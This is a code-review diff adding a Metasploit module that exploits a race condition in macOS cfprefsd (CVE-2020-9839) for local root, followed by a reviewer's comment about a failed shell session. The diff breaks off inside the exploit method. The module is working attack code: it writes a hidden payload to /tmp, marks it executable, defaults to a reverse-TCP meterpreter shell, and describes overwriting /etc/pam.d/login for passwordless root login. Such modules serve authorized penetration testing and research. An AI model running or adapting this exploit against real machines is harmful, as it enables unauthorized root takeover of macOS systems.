modules/exploits/osx/local/cfprefsd_race_condition.rb

```diff
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::File
+  include Msf::Post::OSX::Priv
+  include Msf::Post::OSX::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'macOS cfprefsd Arbitrary File Write Local Privilege Escalation',
+        'Description' => %q{
+          This module exploits an arbitrary file write in cfprefsd on macOS <= 10.15.4 in
+          order to run a payload as root. The CFPreferencesSetAppValue function, which is
+          reachable from most unsandboxed processes, can be exploited with a race condition
+          in order to overwrite an arbitrary file as root. By overwriting /etc/pam.d/login
+          a user can then login as root with the `login root` command without a password.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Yonghwi Jin <jinmoteam[at]gmail.com>', # pwn2own2020
+            'Jungwon Lim <setuid0[at]protonmail.com>', # pwn2own2020
+            'Insu Yun <insu[at]gatech.edu>', # pwn2own2020
+            'Taesoo Kim <taesoo[at]gatech.edu>', # pwn2own2020
+            'timwr' # metasploit integration
+          ],
+        'References' => [
+          ['CVE', '2020-9839'],
+          ['URL', 'https://github.com/sslab-gatech/pwn2own2020'],
+        ],
+        'Platform' => 'osx',
+        'Arch' => ARCH_X64,
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
+        'Targets' => [
+          [ 'Mac OS X x64 (Native Payload)', {} ],
+        ],
+        'DisclosureDate' => 'Mar 18 2020'
+      )
+    )
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def check
+    version = Gem::Version.new(get_system_version)
+    if version > Gem::Version.new('10.15.4')
+      CheckCode::Safe
+    else
+      CheckCode::Appears
+    end
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
+    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+    upload_and_chmodx payload_file, binary_payload
+    register_file_for_cleanup payload_file
```

Comment:
Strange but interesting. If you chain this with https://github.com/rapid7/metasploit-framework/pull/13996, then cleanup the payload file (which happens by default), then run `meterpreter > shell`, you get:
```
meterpreter > shell
Process 745 created.
Channel 1 created.
id
[-] 8: Operation failed: 9
```